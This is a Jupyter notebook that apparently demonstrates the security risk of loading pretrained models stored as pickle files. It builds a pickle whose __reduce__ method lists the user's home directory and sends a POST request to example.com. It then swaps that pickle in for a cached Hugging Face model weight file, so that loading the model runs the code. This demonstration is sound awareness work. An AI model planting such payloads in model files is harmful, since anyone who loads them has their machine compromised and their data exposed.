---
---
# Pretrained Model Security Risk

This notebook contains a simple demonstration of one type of risk associated with using a pretrained model.

In [18]:
import pickle
import requests
import os
from transformers import AutoTokenizer, AutoModel
import torch

---
### Loading a pre-trained model from Hugging Face

In [4]:
model_name = "gg-ai/distill-bert-1220"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModel.from_pretrained(model_name)

Loading a pretrained model results in downloading the directory shown below.

Note the link `pytorch_model.bin` points at a file that is a pickle. This is a binary file that contains the byte stream from serializing an object (a Pytorch model in this case).

In [5]:
!tree /Users/aaron/.cache/huggingface/hub/models--gg-ai--distill-bert-1220

/Users/aaron/.cache/huggingface/hub/models--gg-ai--distill-bert-1220
├── blobs
│   ├── 0bcbea577210dc608bcd9dfd932d0e7eb49890da
│   ├── 10752ff4bd656c542cac209e9e034e5d3a5a0979
│   ├── 5994899e3a01721d74cafd0a7ada28588707f759
│   ├── 8f80d4a1897f3fdc6d8b2e13a426108eb3f771b6
│   ├── 90608f51a38c6de28bdde4c028f7a167f568ffc20e27bc74a371f5541c26c8da
│   └── a8b3208c2884c4efb86e49300fdd3dc877220cdf
├── refs
│   └── main
└── snapshots
    └── 39fb408f872303ffc0bff9dc4f8ba95e150eae53
        ├── config.json -> ../../blobs/5994899e3a01721d74cafd0a7ada28588707f759
        ├── pytorch_model.bin -> ../../blobs/90608f51a38c6de28bdde4c028f7a167f568ffc20e27bc74a371f5541c26c8da
        ├── special_tokens_map.json -> ../../blobs/a8b3208c2884c4efb86e49300fdd3dc877220cdf
        ├── tokenizer.json -> ../../blobs/0bcbea577210dc608bcd9dfd932d0e7eb49890da
        ├── tokenizer_config.json -> ../../blobs/10752ff4bd656c542cac209e9e034e5d3a5a0979
        └── vocab.txt -> ../../blobs/8f80d4a1897f3fdc6d8b2e13a4

---
### Suppose the `.bin` was malicious

Let's create a pickle that does something dangerous and replace `pytorch_model.bin`. 

And because this is a binary file that saves the byte stream from serialization, you can't inspect it before unserializing it.

In [15]:
class PostYourData:
    def __init__(self):
        print(os.listdir(os.path.expanduser("~")))
        print('')
        response = requests.post("https://www.example.com")
        print(response)
        
    def __reduce__(self):
        return (self.__class__, ())


obj = PostYourData()

with open('risky.pickle', 'wb') as f:
    pickle.dump(obj, f)

['.config', 'Music', '.docker', '.vim', '.DS_Store', 'nltk_data', '.CFUserTextEncoding', '.zshrc', '.local', 'Projects', 'Pictures', '.zprofile', '.zsh_history', '.ipython', 'Desktop', 'Library', '.matplotlib', '.lesshst', '.cups', 'Public', '.keepassxc', '.ssh', 'Movies', '.vimrc', '.Trash', '.jupyter', '.npm', '.terraform.d', 'Documents', '.pyenv', '.vscode', 'Downloads', '.python_history', '.cache', '.aws', '.gitconfig', '.viminfo', '.zsh_sessions']

<Response [200]>


Replace the good file with the malicious one:

In [16]:
#!mv /Users/aaron/.cache/huggingface/hub/models--gg-ai--distill-bert-1220/blobs/90608f51a38c6de28bdde4c028f7a167f568ffc20e27bc74a371f5541c26c8da /Users/aaron/.cache/huggingface/hub/models--gg-ai--distill-bert-1220/blobs/90608f51a38c6de28bdde4c028f7a167f568ffc20e27bc74a371f5541c26c8da_real
!mv /Users/aaron/Projects/pickles/risky.pickle /Users/aaron/.cache/huggingface/hub/models--gg-ai--distill-bert-1220/blobs/90608f51a38c6de28bdde4c028f7a167f568ffc20e27bc74a371f5541c26c8da

### Now, if you loaded a model that contained this `.bin`, it accesses your file system and sends a post request!

In [20]:
try:
    model = AutoModel.from_pretrained(model_name)
except:
    pass

['.config', 'Music', '.docker', '.vim', '.DS_Store', 'nltk_data', '.CFUserTextEncoding', '.zshrc', '.local', 'Projects', 'Pictures', '.zprofile', '.zsh_history', '.ipython', 'Desktop', 'Library', '.matplotlib', '.lesshst', '.cups', 'Public', '.keepassxc', '.ssh', 'Movies', '.vimrc', '.Trash', '.jupyter', '.npm', '.terraform.d', 'Documents', '.pyenv', '.vscode', 'Downloads', '.python_history', '.cache', '.aws', '.gitconfig', '.viminfo', '.zsh_sessions']

<Response [200]>


---